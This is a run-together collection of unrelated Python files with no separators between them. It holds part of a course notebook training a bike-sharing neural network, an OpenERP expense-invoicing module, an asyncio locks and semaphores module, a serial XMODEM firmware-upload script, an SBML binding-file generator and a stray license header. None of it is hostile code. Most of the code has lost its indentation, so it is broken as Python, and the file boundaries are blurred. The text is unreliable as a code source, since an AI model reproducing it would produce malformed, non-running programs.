self.weights_hidden_to_output = np.random.normal(0.0, self.hidden_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.lr = learning_rate
#### TODO: Set self.activation_function to your implemented sigmoid function ####
#
# Note: in Python, you can define a function with a lambda expression,
# as shown below.
        self.activation_function = lambda x : 1 / (1 + np.exp(-x))  # sigmoid
        self.sigmoid_prime = lambda fx : fx * (1 - fx)  # derivative of the sigmoid, expressed in terms of fx = sigmoid(x)
### If the lambda code above is not something you're familiar with,
# You can uncomment out the following three lines and put your
# implementation there instead.
#
#def sigmoid(x):
# return 0 # Replace 0 with your sigmoid calculation here
#self.activation_function = sigmoid
def train(self, features, targets):
''' Train the network on batch of features and targets.
Arguments
---------
features: 2D array, each row is one data record, each column is a feature
targets: 1D array of target values
'''
n_records = features.shape[0]
delta_weights_i_h = np.zeros(self.weights_input_to_hidden.shape)
delta_weights_h_o = np.zeros(self.weights_hidden_to_output.shape)
for X, y in zip(features, targets):
#### Implement the forward pass here ####
### Forward pass ###
# TODO: Hidden layer - Replace these values with your calculations.
hidden_inputs = np.dot(X, self.weights_input_to_hidden) # signals into hidden layer
hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer
# TODO: Output layer - Replace these values with your calculations.
final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer
final_outputs = final_inputs # signals from final output layer
#### Implement the backward pass here ####
### Backward pass ###
# TODO: Output error - Replace this value with your calculations.
error = y - final_outputs # Output layer error is the difference between desired target and actual output.
output_error_term = error * 1
# TODO: Calculate the hidden layer's contribution to the error
hidden_error = output_error_term * self.weights_hidden_to_output.T
# TODO: Backpropagated error terms - Replace these values with your calculations.
hidden_error_term = hidden_error * self.sigmoid_prime(hidden_outputs)
# Weight step (input to hidden)
delta_weights_i_h += hidden_error_term * X[:, None]
# Weight step (hidden to output)
delta_weights_h_o += output_error_term * hidden_outputs[:, None]
# TODO: Update the weights - Replace these values with your calculations.
self.weights_hidden_to_output += self.lr * delta_weights_h_o / n_records # update hidden-to-output weights with gradient descent step
self.weights_input_to_hidden += self.lr * delta_weights_i_h / n_records # update input-to-hidden weights with gradient descent step
def run(self, features):
''' Run a forward pass through the network with input features
Arguments
---------
features: 1D array of feature values
'''
#### Implement the forward pass here ####
# TODO: Hidden layer - replace these values with the appropriate calculations.
hidden_inputs = np.dot(features, self.weights_input_to_hidden) # signals into hidden layer
hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer
# TODO: Output layer - Replace these values with the appropriate calculations.
final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer
final_outputs = final_inputs # signals from final output layer
return final_outputs
# In[28]:
def MSE(y, Y):
return np.mean((y-Y)**2)
# ## Unit Tests
#
# Run these unit tests to check your network implementation. They help make sure the network was implemented correctly before you start training it. These tests must pass for the project to be accepted.
# In[31]:
import unittest
inputs = np.array([[0.5, -0.2, 0.1]])
targets = np.array([[0.4]])
test_w_i_h = np.array([[0.1, -0.2],
[0.4, 0.5],
[-0.3, 0.2]])
test_w_h_o = np.array([[0.3],
[-0.1]])
class TestMethods(unittest.TestCase):
##########
# Unit tests for data loading
##########
def test_data_path(self):
# Test that file path to dataset has been unaltered
self.assertTrue(data_path.lower() == 'bike-sharing-dataset/hour.csv')
def test_data_loaded(self):
# Test that data frame loaded
self.assertTrue(isinstance(rides, pd.DataFrame))
##########
# Unit tests for network functionality
##########
def test_activation(self):
network = NeuralNetwork(3, 2, 1, 0.5)
# Test that the activation function is a sigmoid
self.assertTrue(np.all(network.activation_function(0.5) == 1/(1+np.exp(-0.5))))
def test_train(self):
# Test that weights are updated correctly on training
network = NeuralNetwork(3, 2, 1, 0.5)
network.weights_input_to_hidden = test_w_i_h.copy()
network.weights_hidden_to_output = test_w_h_o.copy()
network.train(inputs, targets)
self.assertTrue(np.allclose(network.weights_hidden_to_output,
np.array([[ 0.37275328],
[-0.03172939]])))
self.assertTrue(np.allclose(network.weights_input_to_hidden,
np.array([[ 0.10562014, -0.20185996],
[0.39775194, 0.50074398],
[-0.29887597, 0.19962801]])))
def test_run(self):
# Test correctness of run method
network = NeuralNetwork(3, 2, 1, 0.5)
network.weights_input_to_hidden = test_w_i_h.copy()
network.weights_hidden_to_output = test_w_h_o.copy()
self.assertTrue(np.allclose(network.run(inputs), 0.09998924))
suite = unittest.TestLoader().loadTestsFromModule(TestMethods())
unittest.TextTestRunner().run(suite)
# ## Train the Network
#
# Now you'll set the hyperparameters for the network. The strategy is to pick hyperparameters so that the error on the training set is low without overfitting the data. If you train the network too long, or use too many hidden nodes, it can become overly specific to the training set and fail to generalize to the validation set. That is, the validation loss will start to rise while the training loss keeps falling.
#
# You'll also train the network with Stochastic Gradient Descent (SGD): for every training pass, take a random sample of the data instead of the whole dataset. This requires more training passes than ordinary gradient descent, but each pass is faster, so the network trains more efficiently. You'll learn more about SGD later.
#
#
# ### Choosing the Number of Iterations
#
# This is the number of batches sampled from the training data while training the network. The more iterations, the better the model fits the data. However, too many iterations and the model won't generalize to other data; this is called overfitting. Pick a number that keeps the training loss low while the validation loss stays moderate. As you start to overfit, you'll see the training loss keep dropping while the validation loss starts to climb.
#
# ### Choosing the Learning Rate
#
# The learning rate scales the size of the weight updates. If it's too large, the weights become too big and the network fails to fit the data. A good starting point is 0.1. If the network has trouble fitting the data, try lowering the learning rate. Note that the lower the learning rate, the smaller the weight-update steps and the longer the network takes to converge.
#
#
# ### Choosing the Number of Hidden Nodes
#
# The more hidden nodes, the more accurate the model's predictions can be. Try different numbers of hidden nodes and see how it affects performance. You can look at the losses dictionary for a metric of the network's performance. If there are too few hidden units, the model won't have enough room to learn; too many, and the learning has too many directions to choose from. The trick to picking the number of hidden units is finding the right balance.
# In[59]:
import sys
### Set the hyperparameters here ###
iterations = 4000
learning_rate = 0.3
hidden_nodes = 4
output_nodes = 1
N_i = train_features.shape[1]
network = NeuralNetwork(N_i, hidden_nodes, output_nodes, learning_rate)
losses = {'train':[], 'validation':[]}
for ii in range(iterations):
# Go through a random batch of 128 records from the training data set
batch = np.random.choice(train_features.index, size=128)
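    # NOTE: .ix is the old pandas indexer this notebook was written against;
    # later pandas versions deprecated it in favor of .loc / .iloc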
X, y = train_features.ix[batch].values, train_targets.ix[batch]['cnt']
network.train(X, y)
# Printing out the training progress
train_loss = MSE(network.run(train_features).T, train_targets['cnt'].values)
val_loss = MSE(network.run(val_features).T, val_targets['cnt'].values)
sys.stdout.write("\rProgress: {:2.1f}".format(100 * ii/float(iterations)) + "% ... Training loss: " + str(train_loss)[:5] + " ... Validation loss: " + str(val_loss)[:5])
sys.stdout.flush()
losses['train'].append(train_loss)
losses['validation'].append(val_loss)
# In[60]:
plt.plot(losses['train'], label='Training loss')
plt.plot(losses['validation'], label='Validation loss')
plt.legend()
_ = plt.ylim()
# ## Check Out Your Predictions
#
# Use the test data to see how well your network models the data. If it's completely wrong, make sure every step in the network is implemented correctly.
# In[61]:
fig, ax = plt.subplots(figsize=(8,4))
mean, std = scaled_features['cnt']
predictions = network.run(test_features).T*std + mean
ax.plot(predictions[0], label='Prediction')
ax.plot((test_targets['cnt']*std + mean).values, label='Data')
ax.set_xlim(right=len(predictions))
ax.legend()
dates = pd.to_datetime(rides.ix[test_data.index]['dteday'])
dates = dates.apply(lambda d: d.strftime('%b %d'))
ax.set_xticks(np.arange(len(dates))[12::24])
_ = ax.set_xticklabels(dates[12::24], rotation=45)
# ## Optional: Thinking About Your Results (this answer will not be graded)
#
#
# Answer the following questions about your results. How well does the model predict the data? Where does it fail? Why does it fail where it does?
#
# > **Note**: You can edit this text by double-clicking the cell. To preview the text, press Control + Enter
#
# #### Write your answer below
#
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.osv.orm import intersect
from openerp.tools.translate import _
from openerp.addons.decimal_precision import decimal_precision as dp
class account_analytic_account(osv.osv):
_name = "account.analytic.account"
_inherit = "account.analytic.account"
def _get_total_estimation(self, account):
tot_est = super(account_analytic_account, self)._get_total_estimation(account)
if account.charge_expenses:
tot_est += account.est_expenses
return tot_est
def _get_total_invoiced(self, account):
total_invoiced = super(account_analytic_account, self)._get_total_invoiced(account)
if account.charge_expenses:
total_invoiced += account.expense_invoiced
return total_invoiced
def _get_total_remaining(self, account):
total_remaining = super(account_analytic_account, self)._get_total_remaining(account)
if account.charge_expenses:
total_remaining += account.remaining_expense
return total_remaining
def _get_total_toinvoice(self, account):
total_toinvoice = super(account_analytic_account, self)._get_total_toinvoice(account)
if account.charge_expenses:
total_toinvoice += account.expense_to_invoice
return total_toinvoice
    def _remaining_expense_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.est_expenses != 0:
res[account.id] = max(account.est_expenses - account.expense_invoiced, account.expense_to_invoice)
else:
res[account.id]=0.0
return res
def _expense_to_invoice_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
        # We don't want consolidation for each of these fields because these complex computations are resource-greedy.
for account in self.pool.get('account.analytic.account').browse(cr, uid, ids, context=context):
cr.execute("""
SELECT product_id, sum(amount), user_id, to_invoice, sum(unit_amount), product_uom_id, line.name
FROM account_analytic_line line
LEFT JOIN account_analytic_journal journal ON (journal.id = line.journal_id)
WHERE account_id = %s
AND journal.type = 'purchase'
AND invoice_id IS NULL
AND to_invoice IS NOT NULL
GROUP BY product_id, user_id, to_invoice, product_uom_id, line.name""", (account.id,))
res[account.id] = 0.0
for product_id, total_amount, user_id, factor_id, qty, uom, line_name in cr.fetchall():
#the amount to reinvoice is the real cost. We don't use the pricelist
total_amount = -total_amount
factor = self.pool.get('hr_timesheet_invoice.factor').browse(cr, uid, factor_id, context=context)
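                # factor.factor is the discount percentage, so (100 - factor) / 100 is the share of the cost to invoice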
res[account.id] += total_amount * (100 - factor.factor or 0.0) / 100.0
return res
def _expense_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
lines_obj = self.pool.get('account.analytic.line')
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = 0.0
line_ids = lines_obj.search(cr, uid, [('account_id','=', account.id), ('invoice_id','!=',False), ('to_invoice','!=', False), ('journal_id.type', '=', 'purchase')], context=context)
            # Put invoices in a separate list so they are not counted twice
invoices = []
for line in lines_obj.browse(cr, uid, line_ids, context=context):
if line.invoice_id not in invoices:
invoices.append(line.invoice_id)
for invoice in invoices:
res[account.id] += invoice.amount_untaxed
return res
def _ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
result = super(account_analytic_account, self)._ca_invoiced_calc(cr, uid, ids, name, arg, context=context)
for acc in self.browse(cr, uid, result.keys(), context=context):
result[acc.id] = result[acc.id] - (acc.expense_invoiced or 0.0)
return result
_columns = {
'charge_expenses' : fields.boolean('Charge Expenses'),
'expense_invoiced' : fields.function(_expense_invoiced_calc, type="float"),
'expense_to_invoice' : fields.function(_expense_to_invoice_calc, type='float'),
        'remaining_expense' : fields.function(_remaining_expense_calc, type="float"),
'est_expenses': fields.float('Estimation of Expenses to Invoice'),
'ca_invoiced': fields.function(_ca_invoiced_calc, type='float', string='Invoiced Amount',
help="Total customer invoiced amount for this account.",
digits_compute=dp.get_precision('Account')),
}
def on_change_template(self, cr, uid, id, template_id, context=None):
res = super(account_analytic_account, self).on_change_template(cr, uid, id, template_id, context=context)
if template_id and 'value' in res:
template = self.browse(cr, uid, template_id, context=context)
res['value']['charge_expenses'] = template.charge_expenses
res['value']['est_expenses'] = template.est_expenses
return res
def open_hr_expense(self, cr, uid, ids, context=None):
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
dummy, act_window_id = mod_obj.get_object_reference(cr, uid, 'hr_expense', 'expense_all')
result = act_obj.read(cr, uid, act_window_id, context=context)
line_ids = self.pool.get('hr.expense.line').search(cr,uid,[('analytic_account', 'in', ids)])
result['domain'] = [('line_ids', 'in', line_ids)]
names = [account.name for account in self.browse(cr, uid, ids, context=context)]
result['name'] = _('Expenses of %s') % ','.join(names)
result['context'] = {'analytic_account': ids[0]}
result['view_type'] = 'form'
return result
def hr_to_invoice_expense(self, cr, uid, ids, context=None):
domain = [('invoice_id','=',False),('to_invoice','!=',False), ('journal_id.type', '=', 'purchase'), ('account_id', 'in', ids)]
names = [record.name for record in self.browse(cr, uid, ids, context=context)]
name = _('Expenses to Invoice of %s') % ','.join(names)
return {
'type': 'ir.actions.act_window',
'name': name,
'view_type': 'form',
'view_mode': 'tree,form',
'domain' : domain,
'res_model': 'account.analytic.line',
'nodestroy': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
"""Synchronization primitives."""
__all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore']
import collections
from . import events
from . import futures
from .coroutines import coroutine
class _ContextManager:
"""Context manager.
This enables the following idiom for acquiring and releasing a
lock around a block:
with (yield from lock):
<block>
while failing loudly when accidentally using:
with lock:
<block>
"""
def __init__(self, lock):
self._lock = lock
def __enter__(self):
# We have no use for the "as ..." clause in the with
# statement for locks.
return None
def __exit__(self, *args):
try:
self._lock.release()
finally:
self._lock = None # Crudely prevent reuse.
class Lock:
"""Primitive lock objects.
A primitive lock is a synchronization primitive that is not owned
by a particular coroutine when locked. A primitive lock is in one
of two states, 'locked' or 'unlocked'.
It is created in the unlocked state. It has two basic methods,
acquire() and release(). When the state is unlocked, acquire()
changes the state to locked and returns immediately. When the
state is locked, acquire() blocks until a call to release() in
another coroutine changes it to unlocked, then the acquire() call
resets it to locked and returns. The release() method should only
be called in the locked state; it changes the state to unlocked
and returns immediately. If an attempt is made to release an
unlocked lock, a RuntimeError will be raised.
    When more than one coroutine is blocked in acquire() waiting for
    the state to turn to unlocked, only one coroutine proceeds when a
    release() call resets the state to unlocked; the first coroutine
    that blocked in acquire() is the one that proceeds.
acquire() is a coroutine and should be called with 'yield from'.
Locks also support the context management protocol. '(yield from lock)'
should be used as context manager expression.
Usage:
lock = Lock()
...
yield from lock
try:
...
finally:
lock.release()
Context manager usage:
lock = Lock()
...
with (yield from lock):
...
Lock objects can be tested for locking state:
if not lock.locked():
yield from lock
else:
# lock is acquired
...
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._locked = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self._locked else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Return True if lock is acquired."""
return self._locked
@coroutine
def acquire(self):
"""Acquire a lock.
This method blocks until the lock is unlocked, then sets it to
locked and returns True.
"""
if not self._waiters and not self._locked:
self._locked = True
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._locked = True
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a lock.
When the lock is locked, reset it to unlocked, and return.
If any other coroutines are blocked waiting for the lock to become
unlocked, allow exactly one of them to proceed.
When invoked on an unlocked lock, a RuntimeError is raised.
There is no return value.
"""
if self._locked:
self._locked = False
# Wake up the first waiter who isn't cancelled.
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
break
else:
raise RuntimeError('Lock is not acquired.')
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
# This must exist because __enter__ exists, even though that
# always raises; that's how the with-statement works.
pass
def __iter__(self):
# This is not a coroutine. It is meant to enable the idiom:
#
# with (yield from lock):
# <block>
#
# as an alternative to:
#
# yield from lock.acquire()
# try:
# <block>
# finally:
# lock.release()
yield from self.acquire()
return _ContextManager(self)
class Event:
"""Asynchronous equivalent to threading.Event.
Class implementing event objects. An event manages a flag that can be set
to true with the set() method and reset to false with the clear() method.
The wait() method blocks until the flag is true. The flag is initially
false.
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._value = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'set' if self._value else 'unset'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def is_set(self):
"""Return True if and only if the internal flag is true."""
return self._value
def set(self):
"""Set the internal flag to true. All coroutines waiting for it to
        become true are awakened. Coroutines that call wait() once the flag is
true will not block at all.
"""
if not self._value:
self._value = True
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
def clear(self):
"""Reset the internal flag to false. Subsequently, coroutines calling
wait() will block until set() is called to set the internal flag
to true again."""
self._value = False
@coroutine
def wait(self):
"""Block until the internal flag is true.
If the internal flag is true on entry, return True
immediately. Otherwise, block until another coroutine calls
set() to set the flag to true, then return True.
"""
if self._value:
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
class Condition:
"""Asynchronous equivalent to threading.Condition.
This class implements condition variable objects. A condition variable
allows one or more coroutines to wait until they are notified by another
coroutine.
A new Lock object is created and used as the underlying lock.
"""
def __init__(self, lock=None, *, loop=None):
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
if lock is None:
lock = Lock(loop=self._loop)
elif lock._loop is not self._loop:
raise ValueError("loop argument must agree with lock")
self._lock = lock
# Export the lock's locked(), acquire() and release() methods.
self.locked = lock.locked
self.acquire = lock.acquire
self.release = lock.release
self._waiters = collections.deque()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
@coroutine
def wait(self):
"""Wait until notified.
If the calling coroutine has not acquired the lock when this
method is called, a RuntimeError is raised.
This method releases the underlying lock, and then blocks
until it is awakened by a notify() or notify_all() call for
the same condition variable in another coroutine. Once
awakened, it re-acquires the lock and returns True.
"""
if not self.locked():
raise RuntimeError('cannot wait on un-acquired lock')
self.release()
try:
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
finally:
yield from self.acquire()
@coroutine
def wait_for(self, predicate):
"""Wait until a predicate becomes true.
        The predicate should be a callable whose result will be
interpreted as a boolean value. The final predicate value is
the return value.
"""
result = predicate()
while not result:
yield from self.wait()
result = predicate()
return result
def notify(self, n=1):
"""By default, wake up one coroutine waiting on this condition, if any.
If the calling coroutine has not acquired the lock when this method
is called, a RuntimeError is raised.
This method wakes up at most n of the coroutines waiting for the
condition variable; it is a no-op if no coroutines are waiting.
Note: an awakened coroutine does not actually return from its
wait() call until it can reacquire the lock. Since notify() does
not release the lock, its caller should.
"""
if not self.locked():
raise RuntimeError('cannot notify on un-acquired lock')
idx = 0
for fut in self._waiters:
if idx >= n:
break
if not fut.done():
idx += 1
fut.set_result(False)
def notify_all(self):
"""Wake up all threads waiting on this condition. This method acts
like notify(), but wakes up all waiting threads instead of one. If the
calling thread has not acquired the lock when this method is called,
a RuntimeError is raised.
"""
self.notify(len(self._waiters))
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class Semaphore:
"""A Semaphore implementation.
A semaphore manages an internal counter which is decremented by each
acquire() call and incremented by each release() call. The counter
can never go below zero; when acquire() finds that it is zero, it blocks,
    waiting until some other coroutine calls release().
Semaphores also support the context management protocol.
The optional argument gives the initial value for the internal
counter; it defaults to 1. If the value given is less than 0,
ValueError is raised.
"""
def __init__(self, value=1, *, loop=None):
if value < 0:
raise ValueError("Semaphore initial value must be >= 0")
self._value = value
self._waiters = collections.deque()
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked,value:{}'.format(
self._value)
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Returns True if semaphore can not be acquired immediately."""
return self._value == 0
@coroutine
def acquire(self):
"""Acquire a semaphore.
If the internal counter is larger than zero on entry,
decrement it by one and return True immediately. If it is
zero on entry, block, waiting until some other coroutine has
called release() to make it larger than 0, and then return
True.
"""
if not self._waiters and self._value > 0:
self._value -= 1
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._value -= 1
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a semaphore, incrementing the internal counter by one.
When it was zero on entry and another coroutine is waiting for it to
become larger than zero again, wake up that coroutine.
"""
self._value += 1
for waiter in self._waiters:
if not waiter.done():
waiter.set_result(True)
break
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class BoundedSemaphore(Semaphore):
"""A bounded semaphore implementation.
This raises ValueError in release() if it would increase the value
above the initial value.
"""
def __init__(self, value=1, *, loop=None):
self._bound_value = value
super().__init__(value, loop=loop)
def release(self):
if self._value >= self._bound_value:
raise ValueError('BoundedSemaphore released too many times')
super().release()
import argparse
import os
import math
import serial
import xmodem
import progressbar
parser = argparse.ArgumentParser()
parser.add_argument("port", help="Serial port used to communicate with OBC")
parser.add_argument("file", help="Binary file to upload")
parser.add_argument("description", help="Description for binary")
parser.add_argument("index", help="Slot for binary file (0-5)", nargs='+')
parser.add_argument("--nowait", required=False, help="No wait for bootloader", action='store_true')
args = parser.parse_args()
class Bootloader:
def __init__(self, port):
self._port = port
def wait(self):
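        # Handshake: wait for the bootloader's '&' prompt, request upload mode
        # with 'S', answer the ':' prompt with a newline, then wait for '#'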
self._wait_for('&')
self._port.write('S')
self._wait_for(':')
self._port.write('\n')
self._wait_for('#')
def upload_binary(self, index, description, stream):
# type: (int, str, file) -> bool
self._port.write('x')
self._wait_for('Boot Index: ')
self._port.write(str(index))
self._wait_for('Upload Binary: ')
widgets = [
'Uploading to slot %d ' % index, progressbar.Percentage(),
' ', progressbar.Bar(marker='#', left='[', right=']'),
' ', progressbar.ETA(),
' ', progressbar.FileTransferSpeed(),
]
        file_size = os.fstat(stream.fileno()).st_size
with progressbar.ProgressBar(widgets=widgets, max_value=file_size) as bar:
modem = xmodem.XMODEM(getc=self._xmodem_getc, putc=self._xmodem_putc)
r = modem.send(stream, quiet=True, callback=self._xmodem_report_progress(bar, file_size))
if not r:
print 'Upload failed!'
return False
self._wait_for('Boot Description: ')
self._port.write(description)
self._port.write('\0\n')
        self._wait_for('Done!')
        return True
def _wait_for(self, marker):
s = ''
while not s.endswith(marker):
s += self._port.read(1)
def _xmodem_getc(self, size, timeout=1):
d = self._port.read(size)
return d
def _xmodem_putc(self, data, timeout=1):
l = self._port.write(data)
return l
def _xmodem_report_progress(self, bar, file_size):
# type: (progressbar.ProgressBar, int) -> function
def report(_, success_count, error_count):
packet_size = 128
transferred_size = min([file_size, packet_size * success_count])
bar.update(transferred_size)
return report
def verify_correct_format(file):
header = file.read(4)
if header[0] == ':':
print "Selected HEX file, you have to select BIN file"
return False
elif 'ELF' in header:
print "Selected ELF file, you have to select BIN file"
return False
file.seek(0)
return True
with file(args.file, 'rb') as f:
if not verify_correct_format(f):
exit(1)
port = serial.Serial(port=args.port, baudrate=115200)
print args
bootloader = Bootloader(port)
if not args.nowait:
print 'Waiting for bootloader'
bootloader.wait()
print 'Bootloader ready'
else:
print 'User claims that bootloader is ready'
for slot in args.index:
with file(args.file, 'rb') as f:
bootloader.upload_binary(int(slot), args.description, f)
#!/usr/bin/env python
#
# @file BindingFiles.py
# @brief class for generating the language binding files
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables
from . import DowncastExtensionFile
from . import DowncastNamespaceFile
from . import DowncastPackagesFile
from . import DowncastPluginsFile
from . import NativeSwigFile
from . import BaseBindingsFiles
class BindingFiles():
"""Class for all Bindings files"""
def __init__(self, pkg_object, binding, verbose=False):
        # members from the package object
self.package = pkg_object['name']
self.verbose = verbose
self.binding = binding
self.language = global_variables.language
self.elements = pkg_object['baseElements']
self.plugins = pkg_object['plugins']
#########################################################################
# package files
def write_downcast_extension(self):
if not global_variables.is_package:
return
name = 'local-downcast-extension-{0}'.format(self.package)
ext = DowncastExtensionFile.DowncastExtensionFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_namespace(self):
if not global_variables.is_package:
return
name = 'local-downcast-namespaces-{0}'.format(self.package)
ext = DowncastNamespaceFile.DowncastNamespaceFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_packages(self):
if not global_variables.is_package:
return
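        # C# and Java bindings use a combined 'local-packages' file;
        # the other bindings get a separate 'local-downcast-packages' file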
if self.binding == 'csharp' or self.binding == 'java':
name = 'local-packages-{0}'.format(self.package)
else:
name = 'local-downcast-packages-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_plugins(self):
if not global_variables.is_package:
return
name = 'local-downcast-plugins-{0}'.format(self.package)
ext = DowncastPluginsFile.DowncastPluginsFile(name,
self.package,
self.binding,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
#########################################################################
# local files
def write_local(self):
if global_variables.is_package:
self.write_local_package_files()
else:
self.write_local_library_files()
def write_local_package_files(self):
if self.binding == 'csharp' or self.binding == 'java':
return
else:
name = 'local-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins,
True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_local_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
# write files in the swig directory
def write_swig_files(self):
if global_variables.is_package:
self.write_swig_package_files()
else:
self.write_swig_library_files()
def write_swig_package_files(self):
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=False)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_swig_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
'swig', True)
base_files.write_files()
########################################################################
# other library files
def write_cmake_file(self):
if global_variables.is_package:
return
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
def write_files(self):
if self.binding != 'swig':
self.write_downcast_extension()
self.write_downcast_namespace()
self.write_downcast_packages()
self.write_downcast_plugins()
self.write_local()
else:
self.write_swig_files()
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
